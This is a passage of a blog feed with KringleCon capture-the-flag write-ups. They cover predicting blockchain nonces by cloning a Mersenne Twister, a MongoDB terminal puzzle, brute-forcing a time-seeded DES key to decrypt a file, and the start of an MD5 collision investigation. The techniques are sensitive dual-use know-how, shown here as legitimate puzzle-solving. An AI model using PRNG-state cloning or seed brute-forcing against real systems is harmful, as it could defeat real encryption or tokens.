&lt;a href="https://github.com/cr-marcstevens/hashclash" target="_blank" rel="noopener">MD5 &amp;amp; SHA-1 cryptanalysis&lt;/a>&lt;/li>
&lt;li>Presentation on
&lt;a href="https://speakerdeck.com/ange/colltris" target="_blank" rel="noopener">Hash Collisions Exploitations&lt;/a>&lt;/li>
&lt;li>KringleCon Talk from Prof. Qwerty Petabyte on
&lt;a href="https://www.youtube.com/watch?v=7rLMl88p-ec" target="_blank" rel="noopener">Working with the Official Naughty/Nice Blockchain&amp;hellip;&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>For some extra hints I stop by in Santa&amp;rsquo;s office to talk with &lt;code>Tinsel Upatree&lt;/code>:&lt;/p>
&lt;blockquote>
&lt;p>Howdy Santa! Just guarding the Naughty/Nice list on your desk.
Santa, I don&amp;rsquo;t know if you&amp;rsquo;ve heard, but something is very, very wrong&amp;hellip;
We tabulated the latest score of the Naughty/Nice Blockchain.
Jack Frost is the nicest being in the world! Jack Frost!?!
As you know, we only really start checking the Naughty/Nice totals as we get closer to the holidays.
Out of nowhere, Jack Frost has this crazy score&amp;hellip; positive 4,294,935,958 nice points!
No one has EVER gotten a score that high! No one knows how it happened.
Most of us recall Jack having a NEGATIVE score only a few days ago&amp;hellip;
Worse still, his huge positive score seems to have happened way back in March.
Our first thought was that he somehow changed the blockchain - but, as you know, that isn&amp;rsquo;t possible.
We ran a validation of the blockchain and it all checks out.
Even the smallest change to any block should make it invalid.
Blockchains are huge, so we cut a one minute chunk from when Jack&amp;rsquo;s big score registered back in March.
You can get a slice of the Naughty/Nice blockchain on your desk.
You can get some tools to help you here.
Tangle Coalbox, in the Speaker UNPreparedness room. has been talking with attendees about the issue.&lt;/p>
&lt;/blockquote>
&lt;p>Next I download the
&lt;a href="https://download.holidayhackchallenge.com/2020/OfficialNaughtyNiceBlockchainEducationPack.zip" target="_blank" rel="noopener">tools&lt;/a> mentioned by &lt;code>Tinsel&lt;/code> as well as the blockchain
&lt;a href="https://download.holidayhackchallenge.com/2020/blockchain.dat" target="_blank" rel="noopener">file&lt;/a> which is necessary for solving the main objective.&lt;/p>
&lt;p>&lt;img src="../images/obj11a/blockchain-zip.png" alt="Blockchain and Files in ZIP">&lt;/p>
&lt;p>The two &lt;code>pem&lt;/code> files are not important so much for Objective11a. The bash script, and the Dockerfile are there just for the easy setup of an environment where the python script runs without dependency issues. With the provided python script I can interact with the &lt;code>blockchain.dat&lt;/code> file and extract all the information needed for solving the objective.&lt;/p>
&lt;p>The instructions tell me that the blockchain stops at index 129996, and my task is to predict the nonce for block &lt;code>130000&lt;/code> and submit its &lt;strong>HEX&lt;/strong> value in the badge. This naturally reminds me of the &lt;strong>SnowBall Game&lt;/strong>, so I figure that the same script may be useful here too. I proceed to extract the &lt;code>nonce&lt;/code> values from all the blocks and notice that there are roughly 1500 blocks altogether, plenty more than 624, so that&amp;rsquo;s good! Meanwhile, I also notice that these &lt;code>nonce&lt;/code> values are much larger than the random values that I dealt with in the &lt;strong>SnowBall Game&lt;/strong>. In fact, that game used &lt;code>32 bit&lt;/code> random integers, while this blockchain uses &lt;code>64 bit&lt;/code> integers as nonces.&lt;/p>
&lt;p>Next I try to modify Tom Liston&amp;rsquo;s script to produce 64 bits random values instead of 32 bits. I eventually succeed in this following an
&lt;a href="http://www.cplusplus.com/reference/random/mt19937_64/" target="_blank" rel="noopener">example&lt;/a>. However, the &lt;code>nonce&lt;/code> it generates is not accepted. Next I get in touch with some fellow KringleCon attendees via Discord to discuss my approach to try see if I am in a rabbit hole or not.&lt;/p>
&lt;p>Eventually I realize that the script does not need to be modified, as the sstem that created the blockchain also used a PRNG that produces 32 bit long random values. Rather, the &lt;code>nonce&lt;/code> value in each block is constructed from two independent random values. Part of the challenge is to figure out how they are combined to turn them into a 64 bit random values.&lt;/p>
&lt;p>Next I tweak the &lt;code>naughty_nice.py&lt;/code> script to take the first 312 &lt;code>nonce&lt;/code> values and feed them into the script from Tom Liston&amp;rsquo;s by splitting each &lt;code>nonce&lt;/code> in half. By trial and error I figure out the correct method that&amp;rsquo;s implemented below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="ln"> 1&lt;/span>&lt;span class="n">c2&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">Chain&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">load&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="bp">True&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">filename&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;blockchain.dat&amp;#39;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln"> 2&lt;/span>
&lt;span class="ln"> 3&lt;/span>&lt;span class="n">twister&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">mt19937&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">),&lt;/span> &lt;span class="mi">0&lt;/span>
&lt;span class="ln"> 4&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="n">block&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">c2&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">blocks&lt;/span>&lt;span class="p">[:&lt;/span>&lt;span class="mi">312&lt;/span>&lt;span class="p">]:&lt;/span>
&lt;span class="hl">&lt;span class="ln"> 5&lt;/span> &lt;span class="n">twister&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">MT&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">untemper&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">block&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">nonce&lt;/span> &lt;span class="o">&amp;amp;&lt;/span> &lt;span class="mh">0x00000000FFFFFFFF&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="n">i&lt;/span>&lt;span class="o">+=&lt;/span>&lt;span class="mi">1&lt;/span>
&lt;/span>&lt;span class="hl">&lt;span class="ln"> 6&lt;/span> &lt;span class="n">twister&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">MT&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">untemper&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">block&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">nonce&lt;/span> &lt;span class="o">&amp;gt;&amp;gt;&lt;/span> &lt;span class="mi">32&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="n">i&lt;/span>&lt;span class="o">+=&lt;/span>&lt;span class="mi">1&lt;/span>
&lt;/span>&lt;span class="ln"> 7&lt;/span>
&lt;span class="ln"> 8&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="n">block&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">c2&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">blocks&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="mi">312&lt;/span>&lt;span class="p">:]:&lt;/span>
&lt;span class="ln"> 9&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s2">Real nonce: &lt;/span>&lt;span class="se">\t&lt;/span>&lt;span class="s2">{block.nonce} at index {block.index}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">10&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;Predicted: &lt;/span>&lt;span class="se">\t&lt;/span>&lt;span class="s2">{get_next(twister)}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="ln">11&lt;/span>
&lt;span class="hl">&lt;span class="ln">12&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="nb">range&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">4&lt;/span>&lt;span class="p">):&lt;/span>
&lt;/span>&lt;span class="ln">13&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;Hex-#{i+129997}: &lt;/span>&lt;span class="se">\t&lt;/span>&lt;span class="s2">{hex(get_next(twister))}&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The output shows that starting from block 313, all of the &lt;code>nonce&lt;/code> values from the blocks are identical with the value produced by the cloned generator I created. Finally, I take the hex value for block &lt;code>130000&lt;/code> and submit it in my badge, which is accepted:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln"> 1&lt;/span>...
&lt;span class="ln"> 2&lt;/span>Real nonce: &lt;span class="m">7556872674124112955&lt;/span> at index &lt;span class="m">129995&lt;/span>
&lt;span class="ln"> 3&lt;/span>Predicted: &lt;span class="m">7556872674124112955&lt;/span>
&lt;span class="ln"> 4&lt;/span>Real nonce: &lt;span class="m">16969683986178983974&lt;/span> at index &lt;span class="m">129996&lt;/span>
&lt;span class="ln"> 5&lt;/span>Predicted: &lt;span class="m">16969683986178983974&lt;/span>
&lt;span class="ln"> 6&lt;/span>
&lt;span class="ln"> 7&lt;/span>Hex-#129997: 0xb744baba65ed6fce
&lt;span class="ln"> 8&lt;/span>Hex-#129998: 0x1866abd00f13aed
&lt;span class="ln"> 9&lt;/span>Hex-#129999: 0x844f6b07bd9403e4
&lt;span class="hl">&lt;span class="ln">10&lt;/span>Hex-#130000: 0x57066318f32f729d
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>On to the final objective! 😎&lt;/p></description></item><item><title>Recover Cleartext Document</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective10/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective10/</guid><description>&lt;h2 id="hidden-in-the-mongo">Hidden in the Mongo&lt;/h2>
&lt;p>Instructions in your personal badge:&lt;/p>
&lt;blockquote>
&lt;p>The Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. We can&amp;rsquo;t send you the source, but we do have debug symbols that you can use.
Recover the plaintext content for this encrypted document. We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.
What is the middle line on the cover page? (Hint: it&amp;rsquo;s five words)
For hints on achieving this objective, please visit the NetWars room and talk with Holly Evergreen.&lt;/p>
&lt;/blockquote>
&lt;p>Links in the objective:&lt;/p>
&lt;ul>
&lt;li>
&lt;a href="https://downloads.elfu.org/elfscrow.exe" target="_blank" rel="noopener">elfscrow.exe&lt;/a>&lt;/li>
&lt;li>
&lt;a href="https://downloads.elfu.org/elfscrow.pdb" target="_blank" rel="noopener">elfscrow.pdb&lt;/a>&lt;/li>
&lt;li>
&lt;a href="https://downloads.elfu.org/ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc" target="_blank" rel="noopener">encrypted_document&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>First is a Windows executable, which can be used to perform encryption on arbitrary input and observe output. The second is a file for storing debugging information about a the encryption tool itself (this will help you mitigate the lack of access to its source code), and finally the encrypted document which you need to decipher.&lt;/p>
&lt;p>For further hints you may approach &lt;strong>Holly Evergreen&lt;/strong> in the NetWars room, but he will only reveal them if you help him solve some issues with his terminal first!&lt;/p>
&lt;p>&lt;img src="../images/obj10-room.png" alt="Holly Evergreen in NetWars room">&lt;/p>
&lt;blockquote>
&lt;p>Hey! It&amp;rsquo;s me, Holly Evergreen! My teacher has been locked out of the quiz database and can&amp;rsquo;t remember the right solution.
Without access to the answer, none of our quizzes will get graded.
Can we help get back in to find that solution?
I tried lsof -i, but that tool doesn&amp;rsquo;t seem to be installed.
I think there&amp;rsquo;s a tool like ps that&amp;rsquo;ll help too. What are the flags I need?
Either way, you&amp;rsquo;ll need to know a teensy bit of Mongo once you&amp;rsquo;re in.
Pretty please find us the solution to the quiz!&lt;/p>
&lt;/blockquote>
&lt;p>Now, you should click on the terminal near Holly and dive into the console to help him recover the quiz material he is after:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Hello dear player! Won&lt;span class="s1">&amp;#39;t you please come help me get my wish!
&lt;/span>&lt;span class="s1">I&amp;#39;&lt;/span>m searching teacher&lt;span class="err">&amp;#39;&lt;/span>s database, but all I find are fish!
Do all his boating trips effect some database dilution?
It should not be this hard &lt;span class="k">for&lt;/span> me to find the quiz solution!
Find the solution hidden in the MongoDB on this system.
elf@e496ebfb254b:~$ netstat -a -n -o
Active Internet connections &lt;span class="o">(&lt;/span>servers and established&lt;span class="o">)&lt;/span>
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp &lt;span class="m">0&lt;/span> &lt;span class="m">0&lt;/span> 127.0.0.1:12121 0.0.0.0:* LISTEN off &lt;span class="o">(&lt;/span>0.00/0/0&lt;span class="o">)&lt;/span>
tcp &lt;span class="m">0&lt;/span> &lt;span class="m">0&lt;/span> 127.0.0.1:54372 127.0.0.1:12121 TIME_WAIT timewait &lt;span class="o">(&lt;/span>7.43/0/0&lt;span class="o">)&lt;/span>
Active UNIX domain sockets &lt;span class="o">(&lt;/span>servers and established&lt;span class="o">)&lt;/span>
Proto RefCnt Flags Type State I-Node Path
unix &lt;span class="m">2&lt;/span> &lt;span class="o">[&lt;/span> ACC &lt;span class="o">]&lt;/span> STREAM LISTENING &lt;span class="m">168482939&lt;/span> /tmp/mongodb-12121.sock
elf@e496ebfb254b:~$ mongo --port &lt;span class="m">12121&lt;/span>
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:12121/
MongoDB server version: 3.6.3
Welcome to the MongoDB shell.
&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So the hint in the terminal says that the database backend is MongoDB, and so you should first use &lt;strong>netstat&lt;/strong> to find out the port on which the mongod is listening on, then connect to it. Now you are in the mongo shell ready to poke around to find the answer:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&amp;gt; show dbs
admin 0.000GB
config 0.000GB
elfu 0.000GB
&lt;span class="nb">local&lt;/span> 0.000GB
&lt;span class="nb">test&lt;/span> 0.000GB
&amp;gt; use elfu
switched to db elfu
&amp;gt; show tables
bait
chum
line
metadata
solution
system.js
tackle
tincan
&amp;gt; db.solution.find&lt;span class="o">()&lt;/span>
&lt;span class="o">{&lt;/span> &lt;span class="s2">&amp;#34;_id&amp;#34;&lt;/span> : &lt;span class="s2">&amp;#34;You did good! Just run the command between the stars: ** db.loadServerScripts();displaySolution(); **&amp;#34;&lt;/span> &lt;span class="o">}&lt;/span>
&amp;gt; db.loadServerScripts&lt;span class="o">()&lt;/span>
&amp;gt; displaySolution&lt;span class="o">()&lt;/span>
.
__/ __
/
/.&lt;span class="s1">&amp;#39;o&amp;#39;&lt;/span>.
.*.&lt;span class="s1">&amp;#39;.
&lt;/span>&lt;span class="s1"> .&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;*&amp;#39;&lt;/span>.
*&lt;span class="s1">&amp;#39;.o.&amp;#39;&lt;/span>.*.
.&lt;span class="s1">&amp;#39;.*.&amp;#39;&lt;/span>.&lt;span class="s1">&amp;#39;.*.
&lt;/span>&lt;span class="s1"> .o.&amp;#39;&lt;/span>.*.&lt;span class="s1">&amp;#39;.*.&amp;#39;&lt;/span>.
&lt;span class="o">[&lt;/span>_____&lt;span class="o">]&lt;/span>
___/
Congratulations!!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So with this the technical challenge in Holly&amp;rsquo;s terminal is solved, he is ready to provide you with some useful hints for solving Objective:&lt;/p>
&lt;blockquote>
&lt;p>Woohoo! Fantabulous! I&amp;rsquo;ll be the coolest elf in class.
On a completely unrelated note, digital rights management can bring a hacking elf down.
That ElfScrow one can really be a hassle.
It&amp;rsquo;s a good thing Ron Bowes is giving a talk on reverse engineering!
That guy knows how to rip a thing apart. It&amp;rsquo;s like he breathes opcodes!&lt;/p>
&lt;/blockquote>
&lt;p>So his best hint points you to a youtube video from Ron Bowes who has a KringleCon
&lt;a href="https://www.youtube.com/watch?v=obJdpKDpFBA" target="_blank" rel="noopener">talk&lt;/a>. This is definitely a very good hint, be sure to watch it!&lt;/p>
&lt;h2 id="reverse-crypto---main-objective">Reverse crypto - Main Objective&lt;/h2>
&lt;p>To kick off the crypto fun, let&amp;rsquo;s call the &lt;strong>elfscrow.exe&lt;/strong> right away, to see how it can be used.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">C:&lt;span class="se">\U&lt;/span>sers&lt;span class="se">\a&lt;/span>dmin&lt;span class="se">\D&lt;/span>esktop&lt;span class="se">\e&lt;/span>lfscrow&amp;gt; elfscrow.exe
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!
Are you encrypting a file? Try --encrypt! For example:
elfscrow.exe --encrypt &amp;lt;infile&amp;gt; &amp;lt;outfile&amp;gt;
You&lt;span class="s1">&amp;#39;ll be given a secret ID. Keep it safe! The only way to get the file
&lt;/span>&lt;span class="s1">back is to use that secret ID to decrypt it, like this:
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1"> elfscrow.exe --decrypt --id=&amp;lt;secret_id&amp;gt; &amp;lt;infile&amp;gt; &amp;lt;outfile&amp;gt;
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">You can optionally pass --insecure to use unencrypted HTTP. But if you
&lt;/span>&lt;span class="s1">do that, you&amp;#39;&lt;/span>ll be vulnerable to packet sniffers such as Wireshark that
could potentially snoop on your traffic to figure out what&lt;span class="err">&amp;#39;&lt;/span>s going on!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This last sentence seems to invite you to do exactly what it warns against. While running the program with the &lt;strong>&amp;ndash;insecure&lt;/strong> flag and sniffing network traffic with Wireshark, I could not find any vulnerabilities however. It seems that the key ID, useful to retrieve it from the server, is generated quite unpredictably. Thus, instead of attacking the key ID you should attack the algorithm that generates the key for encryption/decryption.&lt;/p>
&lt;p>As mentioned in the objective, the file you need to decrypt was encrypted sometime between 7-9pm on December 6th, 2019 UTC. As such, the plan was to gather enough information to generate the same key that was used to encrypt the file. For this I had to do some further reconnaissance in IDA Pro, so I fired it up with the provided &lt;strong>.pdb&lt;/strong> file.&lt;/p>
&lt;p>After a few minutes of poking around in the GUI, I did a string search for &lt;strong>generate&lt;/strong> and found the sub-routine called &lt;code>generate_key&lt;/code> that seemed interesting. I spent some time studying it and find the highlighted parts quite interesting on the below screenshot:&lt;/p>
&lt;p>&lt;img src="../images/obj10-keygen.png" alt="Generate_Key IDA PDB">&lt;/p>
&lt;p>It seems that in order to generate the key, it uses the timestamp as a seed to the random number generator. Pretty useful observation. Next I notice a loop, that executes 8 times and generates 8 bits of random data on each iteration, so this suggests that it may be using DES encryption algorithm and thus a 64 bit key. To generate the random key, this sub-routine makes a call to &lt;strong>super_secure_random&lt;/strong> on each iteration of the loop, as seen on the below figure:&lt;/p>
&lt;p>&lt;img src="../images/obj10-supersecure.png" alt="Super Secure Random IDA PDB">&lt;/p>
&lt;p>This sub-routine has some constants, for which I do some Google searches to reveal that these are used in Linear Congruential Generator algorithms (LCG for short -
&lt;a href="https://en.wikipedia.org/wiki/Linear_congruential_generator" target="_blank" rel="noopener">link&lt;/a>). Then I searched for some example implementations of this algorithm, and found a very useful website, which has the same algorithm implemented in many different languages. As I like to work with Go, I decided to choose
&lt;a href="https://rosettacode.org/wiki/Linear_congruential_generator#Go" target="_blank" rel="noopener">this&lt;/a> implementation and go from there.&lt;/p>
&lt;p>To see if my code is correct, when it generates a key based on a given seed, I execute the &lt;strong>elfscrow.exe&lt;/strong> once more and noted the values in its output:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">C:&lt;span class="se">\&amp;gt;&lt;/span> elfscrow.exe --insecure --encrypt elfscrow.pdb encrypted_elfscrow.pdb.enc
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!
Our miniature elves are putting together random bits &lt;span class="k">for&lt;/span> your secret key!
&lt;span class="nv">Seed&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="m">1577895929&lt;/span> &lt;span class="s">&amp;lt;&amp;lt; NOTE THIS
&lt;/span>&lt;span class="s">Generated an encryption key: 09f384150bdb41ba (length: 8) &amp;lt;&amp;lt; AN&lt;/span>D THIS
...
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next, I fed the same seed into the algorithm I put together to generate a key for DES, and observed the same key output:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">~/elfscrow ▶ go run lcg.go
Seed: &lt;span class="m">1577895929&lt;/span>
Key: 09f384150bdb41ba
&lt;/code>&lt;/pre>&lt;/div>&lt;p>It seems that the key, generated by my code, is the same that was output in the windows command line terminal after executing &lt;strong>elfscrow.exe&lt;/strong> on a sample file. This is good news! Next, I looked on the Internet for an example implementation of DES decryption in Go and found a good
&lt;a href="https://stackoverflow.com/questions/41579325/golang-how-do-i-decrypt-with-des-cbc-and-pkcs7" target="_blank" rel="noopener">solution&lt;/a> on StackOverflow&amp;hellip; as usual!&lt;/p>
&lt;p>Finally, I integrated this Go code for DES decryption with my key generation Go code, and created a tool that loops through every second of the given time interval, generates the corresponding key and uses it for decrypting the given file. If the resulting plain-text is a valid PDF - the plain-text result starts with &lt;code>%PDF&lt;/code> - it will save the result to a pdf file on disk. The program takes around 2-3 minutes to finish iterating through every second of the given time interval, but eventually it successfully recovers the pdf file. The timestamp for when the encryption happened is:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">12/06/2019 @ 8:20pm &lt;span class="o">(&lt;/span>UTC&lt;span class="o">)&lt;/span> - &lt;span class="m">1575663650&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This code can be found in a Github
&lt;a href="https://github.com/florianakos/kringlecon-elfscrow" target="_blank" rel="noopener">repo&lt;/a> I created.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">~/elfscrow ▶ go run des-go.go
Key-Used: b5ad6a321240fbec - TimeStamp: &lt;span class="m">1575663650&lt;/span> - First-4-Chars: %PDF...
~/elfscrow ▶
&lt;/code>&lt;/pre>&lt;/div>&lt;p>After running this program, it will save the pdf in the same directory where it is executed with the decrypted file. Opening the pdf we can finally recover the solution to this objective:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Machine Learning Sleigh Route Finder
&lt;/code>&lt;/pre>&lt;/div></description></item><item><title>Blockchain Investigation Part 2</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective11b/</link><pubDate>Sun, 27 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective11b/</guid><description>&lt;p>&lt;img src="../images/obj11b/objective11b.png" alt="Objective11b">&lt;/p>
&lt;p>This final objective includes no new elves to talk with, so I have to rely on previous intel from &lt;code>Tinsel&lt;/code> and &lt;code>Tangle&lt;/code> who shared quite a lot already as part of
&lt;a href="https://flrnks.netlify.app/tutorials/kringlecon2020/objective11a">Objective11a&lt;/a>.&lt;/p>
&lt;p>The main new piece of information for &lt;code>11b&lt;/code> is the SHA256 of the block that I need to inspect0 closer. It&amp;rsquo;s suspected that Jack has somehow managed to do the impossible and modify its content without breaking the blockchain. The hash of this block is:&lt;/p>
&lt;p>&lt;code>58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f&lt;/code>.&lt;/p>
&lt;p>This final objective mentions that Jack possibly got away with this just by tweaking &lt;code>4 bytes&lt;/code>, so my focus is now to figure out where those 4 bytes may be hidingso that I can try to undo these changes.&lt;/p>
&lt;p>There is a small amount of new information in the badge hints section:&lt;/p>
&lt;ul>
&lt;li>&lt;code>Shinny Upatree&lt;/code> swears that he doesn&amp;rsquo;t remember writing the contents of the document found in that block. Maybe looking closely at the documents, you might find something interesting.&lt;/li>
&lt;li>If Jack was somehow able to change the contents of the block, AND the document without changing the hash&amp;hellip; that would require a &lt;code>very UNIque hash COLLision&lt;/code>.&lt;/li>
&lt;/ul>
&lt;p>These two hint at the fact that Jack has made two modifications, &lt;strong>one in the block data structure&lt;/strong> and &lt;strong>one in the attached PDF&lt;/strong> itself; and secondly that he has may have used the &lt;strong>UNICOLL&lt;/strong> technique which has some very special properties when applied to MD5. The hint about &lt;strong>UNICOLL&lt;/strong> only clicked for me after going through the lengthy slide deck from
&lt;a href="https://speakerdeck.com/ange/colltris" target="_blank" rel="noopener">this presentation&lt;/a> by Ange Albertini.&lt;/p>
&lt;p>Armed with this knowledge I set out to inspect the block in question using the provided python script. I write a bit of code to loop through the whole chain until the block with correct SHA256 is found and then print it to the terminal and save it to file as &lt;code>block129459.dat&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="ln">1&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="n">i&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="nb">range&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nb">len&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">chain&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">blocks&lt;/span>&lt;span class="p">)):&lt;/span>
&lt;span class="ln">2&lt;/span> &lt;span class="n">h&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">SHA256&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">new&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="ln">3&lt;/span> &lt;span class="n">h&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">update&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">chain&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">blocks&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">block_data_signed&lt;/span>&lt;span class="p">())&lt;/span>
&lt;span class="hl">&lt;span class="ln">4&lt;/span> &lt;span class="k">if&lt;/span> &lt;span class="n">h&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">hexdigest&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="o">==&lt;/span> &lt;span class="s1">&amp;#39;58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f&amp;#39;&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;span class="ln">5&lt;/span> &lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">chain&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">blocks&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">])&lt;/span>
&lt;span class="ln">6&lt;/span> &lt;span class="n">chain&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">save_a_block&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">i&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">f&lt;/span>&lt;span class="s2">&amp;#34;block{chain.blocks[i].index}.dat&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Below is a redacted version of this block as printed to terminal:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln"> 1&lt;/span>root@c288761e5038:/usr/src/app# python3 naughty_nice.py
&lt;span class="ln"> 2&lt;/span>Chain Index: &lt;span class="m">129459&lt;/span>
&lt;span class="ln"> 3&lt;/span> Nonce: a9447e5771c704f4
&lt;span class="ln"> 4&lt;/span> PID: 0000000000012fd1
&lt;span class="ln"> 5&lt;/span> RID: 000000000000020f
&lt;span class="ln"> 6&lt;/span> Document Count: &lt;span class="m">2&lt;/span>
&lt;span class="hl">&lt;span class="ln"> 7&lt;/span> Score: ffffffff &lt;span class="o">(&lt;/span>4294967295&lt;span class="o">)&lt;/span>
&lt;/span>&lt;span class="hl">&lt;span class="ln"> 8&lt;/span> Sign: &lt;span class="m">1&lt;/span> &lt;span class="o">(&lt;/span>Nice&lt;span class="o">)&lt;/span>
&lt;/span>&lt;span class="ln"> 9&lt;/span> Data item: &lt;span class="m">1&lt;/span>
&lt;span class="hl">&lt;span class="ln">10&lt;/span> Data Type: ff &lt;span class="o">(&lt;/span>Binary blob&lt;span class="o">)&lt;/span>
&lt;/span>&lt;span class="hl">&lt;span class="ln">11&lt;/span> Data Length: 0000006c
&lt;/span>&lt;span class="hl">&lt;span class="ln">12&lt;/span> Data: b&lt;span class="s1">&amp;#39;ea4...8d8f09&amp;#39;&lt;/span>
&lt;/span>&lt;span class="ln">13&lt;/span> Data item: &lt;span class="m">2&lt;/span>
&lt;span class="ln">14&lt;/span> Data Type: &lt;span class="m">05&lt;/span> &lt;span class="o">(&lt;/span>PDF&lt;span class="o">)&lt;/span>
&lt;span class="ln">15&lt;/span> Data Length: 00009f57
